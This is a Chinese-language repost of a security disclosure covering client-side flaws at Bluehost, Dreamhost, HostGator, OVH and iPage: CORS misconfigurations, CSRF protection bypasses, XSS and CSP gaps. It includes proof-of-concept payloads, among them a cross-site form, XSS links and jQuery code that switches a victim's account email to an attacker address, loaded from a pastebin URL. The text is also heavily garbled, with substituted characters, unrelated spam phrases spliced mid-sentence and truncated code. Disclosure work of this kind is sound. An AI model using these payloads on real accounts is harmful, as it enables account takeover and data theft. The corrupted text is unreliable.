首页 国际新闻正文
香港风流

最近,咱们在对Bluehost、Dreamhost、HostGator、OVH和iPage5家盛行的网站保管效劳商(进行安全检验,意图在于发现这些网站保管渠道是否存在一些可导致被侵略的缝隙。终究,不幸的是,经检验发现,这5家网站保管渠道都至少存在一种简略可运用的客户端缝隙,可导致对注册用户的账号绑架和信息走漏。

值得注意的是,这5家网站保管渠道都占有着许多的用户市场份额,咱们常常延聘专业渗透人员进行检验,期望咱们的检验成果供给给广阔用户最实在的安全参阅。检验结束后,咱们会及时把存在上缝隙通报给相关公司和厂商,让他们进行必要的修正整改。本次检验由安全人员Paulos Yibelo独立完结,他此前曾发现了许多软硬件产品缝隙。

Bluehost存在多个信息走漏和账号绑架缝隙 CORS过错装备导致的信息走漏缝隙

严峻性:高危

影响: 进犯者能够运用这些缝隙盗取:用户个人身份信息(PII),如名字、地址(城市、大街、州、国家)、手机号码、邮编等;部分付出详细信息,如信用卡过期年月、后四位数、绑定名字、开卡类型和付出办法等;能直接登录用户保管运用的WordPress、Mojo、SiteLock等网站办理体系的认证令牌。

Bluehost运用了CORS战略进行跨站资源同享,CORS不同于同源战略SOP,能够在浏览器间完成网站的跨域通讯,众所周知,某些CORS装备十分危险,并且有些装备很简略构成误解。

在观察到Bluehost的API效劳端对特定网站域答应CORS之后,咱们就开端寻求绕过过滤器的办法,检验从方针网站中粥鬲获取到灵敏信息。

形如以下带有HTTP呼应头的音讯阐明,bluehost主机网站具有CORS战略:

Access-Control-Allow-Origin:

也便是说,假如某个网站的呼应音讯如上,其表明,答应来读取该网站上的内容。经检验发现,Bluehost装备了不谨慎的正则表达式规矩,比方,假如浏览器客户端用建议恳求,Bluehost会给出以下呼应:

Access-Control-Allow-Origin:

能够看到,Bluehost只查看了恳求网站的前面字符串,只需匹配bluehost.com即可。这也便是说,歹意进犯者能够通过自行操控的域名如my.blu敬爱老公esour,对五家干流网站保管效劳商进行的一次渗透检验,李荣浩host.com.EVILWEBSITE.com,来用EVILWEBSITE.com下的真实的歹意网站读取Bluehost的网sour,对五家干流网站保管效劳商进行的一次渗透检验,李荣浩站内容。

别的,通过检验咱们还发现,Blu大山之恋ehost的API中会回来一些触及用户身份和技能装备的零星信sour,对五家干流网站保管效劳商进行的一次渗透检验,李荣浩息,从这些信息中,咱们能够获取到Bluehost保管用户的相关认证 token 信息。

检验如下:

首要,在/api/users效劳端这儿,进犯者能够获取到用户的user_id,然后运用这个user_id来查询相关的用户账户和网站内容信息,从这些信息中,进犯者终究可获取到用户的邮箱、名字、地址和WordPress、Mojo、SiteLock等保管网站办理体系的认证token。

如上成果显现,进犯者并非运用了Bluehost保管网站,而是实践运用了保管在evilwebsite.com上的歹意网站来建议歹意恳求,但Bluehost的API呼应中却答应了这一数据读取操作行为。

对CSRF的不妥JSON恳求验证导致的账号绑架缝隙

严峻性:高危

影响:进犯者结构一个歹意链接或网站,利诱Bluehost用户进行点击, 然后运用该缝隙能够修正恣意Bluehost用户受害者的邮箱地址,以此用暗码重置方法获取受害者账户的彻底操控权。

因为Bluehost的恳求处失禁文理和身份验证机制存在不妥装备,构成了该缝隙。理论上来说,当Bluehost用户想更改他们如名字、手机号、地址、邮箱等个人注册信息时,会向Bluehost后端建议以下恳求:

仔细观察能够看到,恳求中未包括任何的token值,也便是说卡为尔,恣意网站都可向这个Bluehost后端建议跨域恳求,完成个人信息更改。

但因为恳求是包括在JSON数据中的,正常来说,这种跨域更改不可能完成,还有人会想到运用Adobe Flash Player来发送跨域更改恳求,但Flash上现已禁用这类功用了。在这儿,咱们能够结构一种特别的技巧,运用Bluehost后端的过错装备,无sour,对五家干流网站保管效劳商进行的一次渗透检验,李荣浩需运用Flash成功完成更改恳求的发送:

https://my.bluehost.com/cgi/account_center/api/profile" method="post" enctype="text/plain">

The above HTML code will generate a JSON request similar to the one we need, {"country":"US","phone":"+1.NEWPHONE","street1":"NEW STREET","last_name":"LastName","email":"NEW@EMAIL.com","city":"N EW","postal_code":"0000","province":"WA","first_name":"FirstName =”, organization":null}

上述input name后等号内的一串信息便是个人用户注册信息,咱们能够把FirstName的value值换为等号,然后把其它值加入到organization”:null特点值中去。

能够看到,上述恳求是以Content-Type: text/plain,而不是Content-Type: application/json来发送的,但Bluehost效劳端并不作严厉查看过滤,所以终究能够有用完成cross-origin跨域。

正常流程,Bluehost效劳端会查看 Referrer 头中的网站域名信息是否归于bluehost.com,假如不是,Bluehost 效劳端会回绝恳求并呼应500类型过错。这种查看可在meta标签中运用Content=”no-referrer”来很简略地绕过,这样的话,Bluehost效劳端就能答应恳求了。

不妥的CORS验证导致的中间人进犯缝隙

严峻性:中危

影响:金马堂尽管Bluehost运用了SSL/HTTPS来加密通讯,但进犯者运用该漏sour,对五家干流网站保管效劳商进行的一次渗透检验,李荣浩洞,可潜伏在方针网络的WIFI或局域网中,嗅探Bluehost内部用户的明文通讯。

该缝隙首要因为CORS过错装备导致 ,当其它恳求源读取Bluehost网站内容时,这种情况下,Bluehost不对协议和相关机制作出验证,如下:

在上述恳求呼应中可看到,Bluehost保管网站授权了一个HTTP恳求源进行内容读取,且呼应音讯中答应该HTTP恳求源网站不加密地读取Bluehost保管网站内容,这种降级进犯导致Bluehost本身的SSL认证机制失效无用,并违反了运用HTTPS机制的全体准则。

my.bluehost.com上可导致账号绑架的XSS缝隙

严峻性:高危

影响:进犯者运用该缝隙能够bluehost.com客户端用户身份履行命令,完成对保管网站内容和注册邮箱的增删查改操作。保管网站的注册用户只需点击了进犯者结构了歹意链接,或是拜访是进犯者指向了歹意网站,其个人注册信息就会被盗取。

这其间,由两个低危问题导致了这个严峻缝隙,第一个问题是Bluehost在用户邮箱更改时不需要用户暗码承认,也便是说,任何人运用XSS缝隙即可完成用户邮箱地址和暗码重置;第二个便是, Bluehost在Cookie音讯中未作HttpOnly 符号,导致进犯者能够结构歹意Java盗取Cookie音讯内容,然后运用这些Cookie内容完成合法的用户认证。

PoC:

https://my.bluehost.com/cgi/dm/subdomain/redirect?domainkey=”>

检验视频如下:

Dreamhost存在的XSS和信息走漏缝隙 XSS缝隙导致的账号绑架缝隙

严峻性:高危

影响:进犯者可运用该缝隙,利诱受害者点击歹意链接或拜访网站方法,到达更改注册用户的邮箱或暗码淮南搜索引擎优化赛雷猴。

缝隙Payload:

https://panel.dreamhost.com/tree=domain.manage¤t_step=Index&next_step=ShowAddhttp&domain=:lol”>

因为DreamHost本身当用户更改邮箱时无需暗码承认,所以,进一步运用上述缝隙方法,可完成账号绑架。别的,深化运用该XSS缝隙,还可履行CSRF进犯,绑架恣意账户。

$.ajax({

url: "https://panel.dreamhost.com/id/?tab=contact&command=edit",

method: "POST",

dataType: "html",

success: function(response)

{

var security_cookie =

$(response).find("input[name='security_cookie']").val;

$.post( "https://panel.dreamhost.com/id/?", { tab: "contact",

command: "submit_edit", security_cookie :securi搜索引擎优化唐勇ty_cookie, prefix : "", first

: "Santa", middle : "", last : "Bluh", suffix : "", street1 : "Nurit 103",

street2 : "", city : "Ora", state : "jerusalem" , zip : "90880" , country :

"IL" , email : "attacker@gmail.com",phone:"+954.8888777",fax: "", chat :"",

twitter:"",url:""}).done(function( data ) {

console.log( data );

});

console.log(security_cookie);

},

error: function(error)

{

console.log($error);

}

});

在上述Java中,panel.dreamhost.com效劳端会把登录用户的邮箱更改为attacker@gmail.com,咱们能够把这段JS代码放到同享网站http://pastebin.com/raw/65CayjA7,然后运用该XSS缝隙,直接完成对注册用户的邮箱更改。终究的结构链接如下:

https://panel.dreamhost.com/tree=domain.managet_step=Index&next_step=ShowAddhttp&domain=:lol%22%3E硕果的丑闻%0A%3C%20async%20src=%22//pastebin.com/raw/65CayjA7%22%3E%3C/%3E%0A%3C%3E%20var%20x%20=%20%22/*

当受害者点击拜访了上述链接之后,其原先哈幼专邮箱就会被更改为进犯者自界说的邮箱。

检验视频如下:

HostGator的CSRF防护绕过和信息走漏缝隙 全站CSRF防护机制绕过缝隙

严峻性:高危

影响:该缝隙存在于HostGator效劳网站的一切用户触及区域。进犯者结构一个歹意链接或网站,利诱HostGator用户进行点击拜访,触发该缝隙完成对注册用户信息的增删查改操作,其间包括对注册邮箱和个人信息的更改。

HostGator效劳端本身应用了anti-CSRF token来对恣意方法的提交操作进行验证,可是,把POST参数中的token更改为token[]=,或是把其值置空之后,HostGator效劳端的CSRF查看为true,CSRF防护机制会被绕过。我置疑这是一种诈骗类型缝隙,如以下伪代码所示:

if (strcasecmp($_GET['token'],"$csrf_token") == 0) {

上述字符串比较函数中,只需两个字符串相同时值才为0。但也存在如空引证的数组类型赋值,这样就会回来一个NULL,而依据PHP比较规矩来看,NULL实践就为0,这样的话,比较值也为真,也可有用通过CSRF查看。如下

data=changeaction&token[]=

HostGator效劳端的别的一种anti-CSRF token是一种根据referrer的查看机制,这种查看为查看恳求是否来自http://portal.hostgator.com/anything?之类的恳求端,可是,运用敞开重定向技巧也很简略绕过这种约束。

多处CORS过错装备导致的信息走漏和HTTPHTTP拆分注入进犯

A.信息走漏

严峻性:高危Moderately High

影响:因为CORS过错魔鬼池死了多少人图片装备,进犯者能够读取来自HostGator的API呼应音讯,这些API呼应音讯中包括了全面的注册用户和网站装备信息。

如下:

上图能够看出,在HostGator呼应音讯的Access-Control-Allow-Origin区域中,答应进犯者操控网站evil.com读取API呼应内容。

缝隙原因在于HostGator的校验规矩不行完善,它只查看放行具有.hostgator女儿奴.com结束的网站域名,像http://evil.com/?null=portal.hostgator.com和evil.com\@.hostgator.com这样的也可绕过其校验机制,也即只需在.hostgator.com前增加恣意字段都行。

B.在Microsoft Edge和Internet Explorer浏览器中的CRLF注入缝隙

严峻性:一般

影响:该缝隙只会对运用Microsoft Edge和Internet Explorer浏览器的HostGator用sour,对五家干流网站保管效劳商进行的一次渗透检验,李荣浩户产生影响,进犯者运用该缝隙能够注入新的头音讯,或履行客户端脚本。

事实上,这儿恣意在恳求中发送的字符呼应在CORS头音讯中后,都不带有任何编码或对\r这样的不合法字符校验机制。也便是说,因为IE和Edge浏览器都把\r (0x0d)以为是一个有用的HTTP头音讯终止符,因而,针对IE和Edge浏览器用户来说,这儿就存在HTTP头注入缝隙了。

C.不妥的CORS机制校验导致的中间人进犯缝隙

严峻性:中等

影响:尽管HostGator运用了SSL/HTTPS来加密通讯,但进犯者运用该缝隙,可潜伏在方针网络的WIFI或局域网中,嗅探HostGator内部的API明文用户通讯。

如HostGator信息走漏缝隙的Burp抓包截图中看到的那样,只需恳求源以.hostgator.com结束,Access-Control-Allow-Origin区域答应恣意跨域恳求,也便是说,只需跨域恳求源为http://anything.hostgator.com,那么本地进犯者在恣意协议或机制下,都可运用CORS方法读取到HTTPS呼应内容。该缝隙意味着,恣意HostGator子域名网站中存在的XSS相似缝隙都能有用被运用,并且,恣意本地网络中的进犯者都能成功读取到CORS方法的呼应内容。

PoC视频如下:

OVH存在的CSRF防护机制绕过和信息走漏缝隙

严峻性:高危

影响:该缝隙存在于整个网站中,进犯者运用该缝隙结构歹意链接或网站,利诱受害者注册用户点击,即可完成对受害者注册用户信息的增删查改操作,包括更改邮箱和其它灵敏个人信息。

OVH本身布置两种CSRF防护办法,一种是查看恳求音讯中的Content-Type是否为application/json,另一种为查看引证来历网站是否为“ovh.com”。从安全视点来讲,这两种办法还远远不行。尽管其它网站不会冒充或假造这两种办法,但咱们发现,可用简略的技巧来绕过它们。

xhr.setRequestHeader(‘Content-Type’,’text/plain; application/json’);

在上述恳求头设置中,假如Content-Type为application/json,浏览器会回绝发送,假如Content-Type设置为’text/plain; application/json’,则浏览器会答应提交通过,形似看来,OVH后端只对Content-Type是否包括application/json作出校验,假如包括,则恳求能够通过。

在第二种referrer引证sour,对五家干流网站保管效劳商进行的一次渗透检验,李荣浩来历查看中,一般来说,这种referrer查看简略被误解和绕过。

在咱们的OVH检验中,OVH效劳端会查看恳求源是否来自“ovh.com”,但并不验证HTTP和HTTPS协议,两种都被视为有用的referrer源协议。在恣意的中间人进犯(MITM)场景中,进犯者能够运用DNS诈骗方法构建歹意的网站,当受害者被利诱拜访之后,进犯者就会运用CSRF payload履行到 (HTTPS)的跳转。因为HTTP和HTTPS协议都被以为是可行的,所以这种referrer源的诈骗也是有用的。假如OVH履行的是HSTS战略,这种危险会被缓解。

这种根据referrer源的CSRF防护机制一般来说不痛不痒,许多干流浏览器都会把这种相关缝隙以为是低优先级缝隙,且不履行修正。例如,安全研究员Manuel Caballero 就发现了Microsoft Edge的一个referrer 诈骗缝隙,该缝隙到现在都还没被Microsoft修正。网站在恳求转发和发送用户数据时,该缝隙就能引发严峻问题。

别的,在此,还得感谢Gmail邮箱机制,发送到myemail+2=@gmail.com款式的邮箱,终究实践上是被发送到了myemail@gmail.com ,所以,咱们能够结构以下Content-Type为‘text/plain; application/json’的头恳求,完成在HTML框架下的邮箱地址更改。结合浏览器缝隙或MITM方法可成功完成对referrer源的诈骗。

{“newEmail”:”myemail+2=@gmail.com”}

检验视频如下:

iPage账号绑架和内容安全战略(CSP)绕过缝隙 账号绑架缝隙

严峻性:高危

影响:进犯者能够运用该缝隙,结构歹意链接或网站,利诱受害者点击拜访,完成长途绑架恣意iPage注册账户。

缝隙原因在于, iPage暗码更改页面中的一个古怪功用,iPage后端不会对暗码更改操作建议当时暗码验证,也不会对用户恳求相关的token信息进行校验。这也便是说,恣意网站都能跨域方法向iPage发送针对受害者账户的暗码更改恳求,进犯者能够把受害者暗码进行恣意更改。存在缝隙的iPage效劳端如下:

https://www1.ipage.com/api军门密爱之娇妻难驯/2.0/user/ipg.username/password

上述抓包恳求中, identifier为ipg.username,不带有任何referrer或恣意token,也便是说,答应跨域完成账户绑架。

多种方法的CSP战略绕过缝隙

严峻性:中危

影响:进犯者能够运用该缝隙在iPage的恣意API呼应中履行点击绑架进犯(Clickjacking),并且能够运用内容和脚本注入方法绕过CSP战略。

iPage本身应用了内容安全战略(CSP)来对API效劳端进行防护,形似这样能够阻挠进犯者注入歹意内容,防止歹意脚本履行,并且,这种CSP战略下只答应某些页面构建嵌入(frame)API呼应效劳端。

大约款式如下:

Conten驱房有术t-Security-Policy: frame-ancestors ‘self’ http://*无人知晓的夏天清晨.impress.ly http://*.dragndropbuilder.com https://*.weeblycloud.com https://*.sitelock.com https://*.mojomarketplace.com http://*.ipage.com http://*.yourhostingaccount.com https://*.ecwid.com

X-Frame-Options: SAMEORIGIN ALLOW-FROM http://*.impress.ly http://*.dragndropbuilder.com https://*.weeblycloud.com https://*.sitelock.com https伊春气候预告://*.mojomarketplace.com http://*.ipage.com http://异能之豪门私生女*.yourhostingaccount.com https://*.ecwid.com

如上所示,可见其间短少了多个要害特点和组件内容,所以可导致:

A. CSP战略中frame-ancestors下的中间人进犯(MITM)

frame-ancestors指令指定了一个能够包括,,

,or

等元素的有用父级。仔细观察上述CSP战略中,可发现frame-ancestors特点界说中,答应多个未加密的HTTP页面构建嵌入(frame),也便是说,潜伏在Wi-Fi或公共网络中的恣意本地进犯者,通过这些网页网站的冒充,都能够构建嵌入(frame)到iPage的API效劳端中。

尽管如IE11等一些干流浏览器并不支撑CSP战略,但有X-Frame-Options头约束,不过,iPage后端依然答应如http://*.impress.ly和http://*.ipage.com等款式的网站嵌入引证。

B. 短少必要特点导致的CSP战略彻底绕过

在上述CSP战略中可看到,其短少ava的有用来历指定符号-src或object-src,这样的话,恣意进犯者能够运用HTML注入缝隙来履行XSS跨站进犯。

检验视频如下:

总结

从上述检验成果能够发现,这5家网站保管效劳商都存在一些简略可被运用的安全缝隙,很简略被黑客侵略操控,期望网站保管效劳商能及时采纳必要办法加以整改修正。关于用户自己来说,在挑选网站保管效劳渠道时,更要对本身网站加强安全性,做足安全防护。

缝隙报送及呼应

Dreamhost是在咱们缝隙通报后,第一家给予咱们反应的效劳商公司。他们的回复如下:

首要,感谢你们对咱们存在缝隙的及时通报,咱们以为这种负责任的缝隙发表方法能极大促进网络安全。现在,咱们现已在咱们本身的出产环境中修正了从panel.dreamhost.com/id/提交恳求导致的CSRF缝隙,并且已增加了必要的安全办法,并对各个效劳端的用户输入履行了过滤查看。

别的,因为Bluehost、iPage和HostGator都被主机供给商Endurance收买办理,所以,经向Endurance通报缝隙后,咱们也收到了他们的反应:

咱们想奉告你们的是,通过咱们对你所报缝隙的内部剖析后,咱们已采纳了相应办法来处理和修正相关的缝隙问题。

值得阐明的是,在咱们对Bluehost的检验smutty验证过程中,因为咱们检验账号有反常操作,被Bluehost勘探封闭了。Bluehost干得好,但这可能有点晚了。

*参阅来历:websiteplanet,clouds编译,转载请注明来自FreeBuf.COM

声明:该文观念仅代表作者自己,搜狐号系信息发布渠道,搜狐仅供给信息存储空间效劳。
版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。